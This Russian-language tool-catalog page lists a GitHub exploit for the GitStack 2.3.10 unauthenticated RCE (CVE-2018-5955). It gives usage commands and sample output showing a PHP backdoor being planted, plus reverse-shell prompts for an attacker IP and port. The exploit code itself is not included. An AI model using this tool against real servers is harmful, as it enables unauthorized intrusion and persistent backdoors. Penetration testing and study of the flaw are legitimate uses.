Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-5955 — Эксплойт для CVE-2018-5955 GitStack 2.3.10 — неаутентифицированное удалённое выполнение кода (RCE). | Kitploit
Инструменты/GitHubGitHub/mikethehash/cve-2018-5955
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubmikethehash/cve-2018-5955

CVE-2018-5955

Эксплойт для CVE-2018-5955 GitStack 2.3.10 — неаутентифицированное удалённое выполнение кода (RCE).

Репозиторий
1031 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-5955

Эксплойт для CVE-2018-5955 GitStack 2.3.10: неаутентифицированное удалённое выполнение кода (RCE)

Exploit: GitStack 2.3.10 - неаутентифицированное удалённое выполнение кода

Date: 18.01.2018

Software Link: https://gitstack.com/

Exploit Author: Kacper Szurek

Original Exploit: https://www.exploit-db.com/exploits/43777

Website: https://security.szurek.pl/

Category: удалённый

CVE: CVE-2018-5955

Эксплойт модифицирован MikeTheHash

Date: 23.06.2023

New features: Интерактивное RCE, определение ОС, функция реверс-шелла, адаптировано с python2 на python3

CVE: CVE-2018-5955

Category: удалённый

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Я не несу ответственности за ваши действия, так как разместил это на GitHub в образовательных целях или для сертифицированного и авторизованного тестирования на проникновение

Как использовать

Установите зависимости:

root@kitploit:~
pip install colorama

Затем запустите командой:

root@kitploit:~
python3 exploit.py

Функции

  • Определение ОС
  • Реверс-шелл

Определение ОС:

ОС будет определена после эксплуатации CVE; в выводе появится строка: "[*] OS: $operatingsystem" (демонстрация ниже)

root@kitploit:~
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----

Вы также можете ввести «os», чтобы узнать тип операционной системы

Реверс-шелл

Чтобы получить работающий реверс-шелл на цели, введите «shell», затем ваш IP и порт для прослушивания, как показано ниже:

root@kitploit:~
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE

Счастливого хакинга!

Скачать инструмент